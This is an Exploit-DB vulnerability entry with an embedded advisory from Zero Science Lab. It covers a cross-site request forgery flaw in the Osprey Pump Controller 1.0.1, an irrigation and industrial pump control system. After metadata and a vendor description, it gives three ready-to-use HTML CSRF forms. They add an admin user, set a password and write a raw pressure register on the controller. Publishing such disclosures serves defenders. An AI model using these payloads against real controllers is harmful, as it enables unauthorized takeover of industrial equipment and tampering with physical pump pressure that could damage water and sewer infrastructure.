Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery

vendor:

Osprey Pump Controller

by:

LiquidWorm

7.5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Osprey Pump Controller

Affected Version From: Software Build ID 20211018, Production 10/18/2021

Affected Version To: Software Build ID 20211018, Production 10/18/2021

Patch Exists: YES

Related CWE: CVE-2021-25982

CPE: a:propump_and_controls:osprey_pump_controller:1.0.1

Metasploit:

Other Scripts:

Platforms Tested:

2021

Osprey Pump Controller 1.0.1 – Cross-Site Request Forgery

ProPump and Controls Osprey Pump Controller version 1.0.1 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious web page or link that, when visited by an authenticated user, can perform arbitrary actions on behalf of the user. This can be used to modify the system configuration, change user passwords, or even shut down the system.

Mitigation:

ProPump and Controls should implement CSRF protection mechanisms to prevent attackers from exploiting this vulnerability.

Source

Exploit-DB raw data:

<!--

# Exploit Title: Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery
# Exploit Author: LiquidWorm




Vendor: ProPump and Controls, Inc.
Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com
Affected version: Software Build ID 20211018, Production 10/18/2021
                  Mirage App: MirageAppManager, Release [1.0.1]
                  Mirage Model 1, RetroBoard II


Summary: Providing pumping systems and automated controls for
golf courses and turf irrigation, municipal water and sewer,
biogas, agricultural, and industrial markets. Osprey: door-mounted,
irrigation and landscape pump controller.

Technology hasn't changed dramatically on pump and electric motors
in the last 30 years. Pump station controls are a different story.
More than ever before, customers expect the smooth and efficient
operation of VFD control. Communications—monitoring, remote control,
and interfacing with irrigation computer programs—have become common
requirements. Fast and reliable accessibility through cell phones
has been a game changer.

ProPump & Controls can handle any of your retrofit needs, from upgrading
an older relay logic system to a powerful modern PLC controller, to
converting your fixed speed or first generation VFD control system to
the latest control platform with communications capabilities.

We use a variety of solutions, from MCI-Flowtronex and Watertronics
package panels to sophisticated SCADA systems capable of controlling
and monitoring networks of hundreds of pump stations, valves, tanks,
deep wells, or remote flow meters.

User friendly system navigation allows quick and easy access to all
critical pump station information with no password protection unless
requested by the customer. Easy to understand control terminology allows
any qualified pump technician the ability to make basic changes without
support. Similar control and navigation platform compared to one of the
most recognized golf pump station control systems for the last twenty
years make it familiar to established golf service groups nationwide.
Reliable push button navigation and LCD information screen allows the
use of all existing control panel door switches to eliminate the common
problems associated with touchscreens.

Global system configuration possibilities allow it to be adapted to
virtually any PLC or relay logic controlled pump stations being used in
the industrial, municipal, agricultural and golf markets that operate
variable or fixed speed. On board Wi-Fi and available cellular modem
option allows complete remote access.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: Apache/2.4.25 (Raspbian)
           Raspbian GNU/Linux 9 (stretch)
           GNU/Linux 4.14.79-v7+ (armv7l)
           Python 2.7.13 [GCC 6.3.0 20170516]
           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git
           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5753
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5753.php


05.01.2023

-->


CSRF Add User:
--------------
<html>
  <body>
    <form action="http://TARGET/setSystemText.php">
      <input type="hidden" name="sysTextValue" value="test" />
      <input type="hidden" name="sysTextName" value="USERNAME1" />
      <input type="hidden" name="backTargetLinkNumber" value="75" />
      <input type="hidden" name="userName" value="ZSL" />
      <input type="submit" value="Add user" />
    </form>
  </body>
</html>


CSRF Set Password:
------------------
<html>
  <body>
    <form action="http://TARGET/setSystemText.php">
      <input type="hidden" name="sysTextValue" value="pass" />
      <input type="hidden" name="sysTextName" value="USERPW1" />
      <input type="hidden" name="backTargetLinkNumber" value="75" />
      <input type="hidden" name="userName" value="t00t" />
      <input type="submit" value="Set pass" />
    </form>
  </body>
</html>


CSRF Set System Pressure Raw:
-----------------------------
<html>
  <body>
    <form action="http://TARGET/mbSetRegister_Int.php">
      <input type="hidden" name="regValue" value="17301" />
      <input type="hidden" name="regAddress" value="40900" />
      <input type="hidden" name="minValue" value="0" />
      <input type="hidden" name="maxValue" value="32767" />
      <input type="hidden" name="backTargetLinkNumber" value="414" />
      <input type="hidden" name="userName" value="w00t" />
      <input type="submit" value="Modify pressure" />
    </form>
  </body>
</html>